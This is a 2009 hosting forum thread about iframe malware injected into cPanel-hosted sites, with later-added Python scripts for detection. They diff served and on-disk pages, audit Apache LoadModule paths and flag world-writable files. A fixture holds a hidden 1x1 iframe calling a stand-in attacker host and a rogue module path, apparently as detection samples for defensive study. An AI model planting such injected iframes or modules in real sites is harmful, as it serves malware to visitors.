The Community Forums


IFrame Hack - Cpanel Forced Update = Fixed?

Discussion in 'Security' started by contemptx, Oct 18, 2009.

  1. contemptx

    contemptx Registered

    Joined:
    Aug 8, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Ok,

    Long story short..ish

    So up until this morning my server & websites were running fine,
    however I woke up today to see that my sites looked like they were corrupted, well the forums anyway.

    So looking through the FTP, all files seemed intact.

    I looked through my non-forum sites and noticed they were serving out malware via an embedded IFrame.

    However, checking the FTP, all files were intact & not altered.

    I decided I would go through and start securing the server to see if I could find the rootkit or whatever was causing the issues, so first off I did a:

    Forced cPanel Update

    Once this had completed my websites were fine?

    I had to run out after that; a few hours later my sites were again hacked.

    Another cPanel update later & my sites were OK again?

    After hours of searching I came across many threads saying that this hack is caused by hackers gaining access to FTP accounts.

    However, I don't use easy passwords: 20+ letters, numbers, symbols.
    Reading further, it was said that they also gain them by infecting the source PC and storing them when you connect to the site for maintenance etc.

    But after a virus / malware scan = nothing (I also have these running 24/7 due to certain data I deal with).

    So anyway, I have updated all passwords and disabled all shell access on accounts.

    But I still don't get how this hack is happening, when files are not being edited and it's currently solved by forcing cPanel to update?

    I have checked just about everything & I cannot find anything out of place?
     
  2. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    Perhaps your Apache is loading a module that is automatically injecting the code into served webpages... and perhaps the module isn't loaded immediately after an Apache restart (which happens after a Cpanel update).

    Restart your Apache and see if the problem instantly "goes away." If it does, then it's likely an Apache module is being loaded at some point. It may stay dormant for a period of time to make you think that everything is alright.

    m
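The test mtindor proposes is a serve-time one: the file on disk is clean, the bytes Apache hands out are not. The Python below is an added example, not code from this thread or from cPanel, that does the two checks a practitioner would run here: it diffs the iframes in a served copy of a page against the on-disk file (flagging the 1x1/hidden ones drive-by kits use), and it audits LoadModule lines in httpd.conf for shared objects living outside the modules directory. The HTML and httpd.conf samples are constructed; /usr/local/apache and its modules/ subdirectory are assumed as the cPanel defaults of the time.

```python
import os
import re
from html.parser import HTMLParser

# Constructed samples (not from the thread): the page as stored on disk, and the same
# page as the server hands it out, with a hidden 1x1 iframe appended by something
# sitting between the filesystem and the client.
ON_DISK_HTML = """<html><head><title>Forum</title></head>
<body><h1>Welcome</h1><p>Latest posts below.</p></body></html>
"""
SERVED_HTML = """<html><head><title>Forum</title></head>
<body><h1>Welcome</h1><p>Latest posts below.</p>
<iframe src="http://evil.example/in.php" width="1" height="1" style="visibility: hidden"></iframe>
</body></html>
"""

# Constructed httpd.conf fragment; the /tmp path is what the audit should catch.
SAMPLE_HTTPD_CONF = """
ServerRoot "/usr/local/apache"
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule php5_module    /usr/local/apache/modules/libphp5.so
LoadModule cache_module   /tmp/.cache/mod_cache.so
"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def find_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    return parser.iframes


def injected_iframes(on_disk, served):
    """Iframes in the served page whose src does not occur in the on-disk file.
    Non-empty while the file's mtime and hash are unchanged means the injection
    happens at serve time (module, output filter, proxy), not in the file."""
    known = {f.get("src") for f in find_iframes(on_disk)}
    return [f for f in find_iframes(served) if f.get("src") not in known]


def is_suspicious_iframe(attrs):
    """Drive-by iframes are typically 0/1 pixel or hidden via style."""
    def px(value):
        try:
            return int(str(value).strip().lower().rstrip("px"))
        except (TypeError, ValueError):
            return None
    width, height = px(attrs.get("width")), px(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
    hidden = "visibility:hidden" in style or "display:none" in style
    return tiny or hidden


SERVERROOT_RE = re.compile(r'^\s*ServerRoot\s+"?([^"\s]+)"?', re.M)
LOADMODULE_RE = re.compile(r'^\s*LoadModule\s+(\S+)\s+"?([^"\s]+)"?', re.M)


def audit_loadmodules(conf_text, module_dir=None):
    """Return (module, resolved .so path) for LoadModule lines whose shared object
    lives outside the expected modules directory. Relative paths resolve against
    ServerRoot, as Apache does; /usr/local/apache is assumed as the cPanel default."""
    m = SERVERROOT_RE.search(conf_text)
    server_root = m.group(1) if m else "/usr/local/apache"
    module_dir = (module_dir or os.path.join(server_root, "modules")).rstrip("/") + "/"
    findings = []
    for name, path in LOADMODULE_RE.findall(conf_text):
        resolved = os.path.normpath(os.path.join(server_root, path))
        if not resolved.startswith(module_dir):
            findings.append((name, resolved))
    return findings


if __name__ == "__main__":
    for f in injected_iframes(ON_DISK_HTML, SERVED_HTML):
        print("injected iframe:", f.get("src"), "(suspicious)" if is_suspicious_iframe(f) else "")
    for name, path in audit_loadmodules(SAMPLE_HTTPD_CONF):
        print("module outside modules dir:", name, path)
```

On a real box, feed `injected_iframes` the file from the account's docroot and the output of `curl -s` for the same URL, and feed `audit_loadmodules` httpd.conf plus every file it Includes, since a LoadModule hidden in an included file is as effective as one in the main config. A grep of the config still misses objects pulled into the running process by other means, so also compare `httpd -M` (the loaded module list) with what the config declares and look at `lsof -p <httpd pid>` for mapped `.so` files you do not recognise; a kernel-level or on-the-wire injection will show up in neither, which is why the served-versus-disk diff is the check to run first.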
     
  3. S-Combs

    S-Combs Well-Known Member

    Joined:
    Jun 10, 2004
    Messages:
    78
    Likes Received:
    0
    Trophy Points:
    6
    Here is some additional information regarding that iframe exploit if you haven't seen this already.
    http://en.wikipedia.org/wiki/Gumblar

    We have had a couple clients in the past who have been affected by this and both swore to have shown clean by their personal anti-virus systems. In each of these cases, however, we did find PHP shells within their file structure. So, regardless of how the problem originated and the fact that all passwords were changed, the hackers were able to return through these shells until they were found and removed.

    You might try multiple scans on your own workstation using different software, as well as using cPanel's anti-virus scan on your server; however, that scan most likely will not locate shells which have been encoded.

    I have used this free script (attached) to help locate shells within accounts. You can adjust the search patterns to help locate various encoding methods within a file structure.

    Good luck
     


  4. contemptx

    contemptx Registered

    Joined:
    Aug 8, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    S-Combs,

    Thank you so much,

    Within minutes of running that script, it found the encoded shell script hiding inside one of my domains.

    I have zero clue how it got there, it was uploaded about a week ago, into a files directory.

    However I have again changed passwords & updated just about everything that can be updated to hopefully keep the intruder out.

    The only thing I'm still confused about is how updating cPanel fixed the issue of the sites loading the IFrame code?
     
  5. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    If you only found one shell script in one domain but all of your sites get nailed with the iframe injection after a period of time, then you have to think in a larger scope.

    Are you running suPHP? I suspect not. If you aren't running suPHP, your Apache is running as "nobody" for all users. So, if one user's site gets hacked, the perpetrator can easily use a handy PHP script or CGI to go through all sites on the server (and in other places on the server) and modify files.

    In the case of a non-suPHP environment, it would be very easy for one malicious script in one user's directory to be used to affect sites serverwide.

    If you are running suPHP, and if you are saying that your server is still experiencing the problem of iframe injections across all domains, then you've got some sort of suspicious module loaded somewhere that is doing it.

    So..

    Are you running suPHP?
    Are you still experiencing the problem of iframe injections across all domains?

    The mere fact that all of your sites were experiencing the iframe injection phenomenon and the fact that your "updating Cpanel" was temporarily fixing the problem leads me to suspect you've got a problem with an apache module [or a kernel module?] injecting iframes automatically. If this is the case, your problem probably didn't go away with the removal of the one script and you've got more at risk than a single site.

    Mike
     
    #5 mtindor, Oct 19, 2009
    Last edited: Oct 19, 2009
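mtindor's point is that without suPHP every account's PHP runs as the same "nobody" user, so a shell in one account can write wherever that user can write, across every docroot on the box. The audit below is an added example for this edit, not code from the thread or from cPanel: it walks each account's document root and reports the traces that kind of lateral write leaves, namely world-writable files and directories (which the shared web user can write into regardless of ownership) and files owned by the web-server user or by some other account rather than the docroot's owner. The /home/<account>/public_html layout and the user name "nobody" are assumptions matching the cPanel setup under discussion; the two-account tree built by `demo()` is constructed.

```python
import os
import pwd
import stat
import tempfile


def audit_docroot(docroot, web_user="nobody"):
    """Walk one account's document root and return (finding, path) pairs for:
      world_writable     - anything with o+w, i.e. writable by the shared web user
      owned_by_web_user  - owned by the web-server user; on a non-suPHP box that means
                           any tenant's script may have written it
      foreign_owner      - owned by neither the account nor the web user
    The docroot's own owner is taken to be the account user (assumption)."""
    try:
        web_uid = pwd.getpwnam(web_user).pw_uid
    except KeyError:
        web_uid = None   # "nobody" is an assumption; pass your server's web user if it differs
    account_uid = os.stat(docroot).st_uid
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append(("world_writable", path))
            if web_uid is not None and st.st_uid == web_uid and st.st_uid != account_uid:
                findings.append(("owned_by_web_user", path))
            elif st.st_uid != account_uid:
                findings.append(("foreign_owner", path))
    return findings


def audit_all(home="/home", docroot_name="public_html", web_user="nobody"):
    """Run audit_docroot over every account under home (cPanel layout assumed)."""
    findings = []
    for acct in sorted(os.listdir(home)):
        docroot = os.path.join(home, acct, docroot_name)
        if os.path.isdir(docroot):
            findings.extend(audit_docroot(docroot, web_user))
    return findings


def demo():
    """Constructed two-account tree: bob has a world-writable upload directory holding
    a world-writable script; alice is clean. Returns {(finding, path relative to home)}."""
    old_umask = os.umask(0o022)   # make the clean files predictably 755/644
    try:
        with tempfile.TemporaryDirectory() as home:
            for acct in ("alice", "bob"):
                d = os.path.join(home, acct, "public_html")
                os.makedirs(d)
                with open(os.path.join(d, "index.php"), "w") as fh:
                    fh.write("<?php echo 'hi'; ?>\n")
            uploads = os.path.join(home, "bob", "public_html", "uploads")
            os.makedirs(uploads)
            os.chmod(uploads, 0o777)
            dropped = os.path.join(uploads, "x.php")
            with open(dropped, "w") as fh:
                fh.write("<?php /* placeholder for a dropped script */ ?>\n")
            os.chmod(dropped, 0o666)
            return {(kind, os.path.relpath(path, home)) for kind, path in audit_all(home)}
    finally:
        os.umask(old_umask)


if __name__ == "__main__":
    for kind, path in sorted(demo()):
        print(kind, path)
```

Run `audit_all()` as root. On a box that really is running suPHP (WHM's Configure PHP and suEXEC page shows the active handler), PHP writes files as the account user, so anything owned by "nobody" under a docroot is a trace worth explaining; on a non-suPHP box every such file is one that any other tenant's script could have written, and the world-writable 777 upload directories that hosting tutorials hand out are the usual landing spot.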
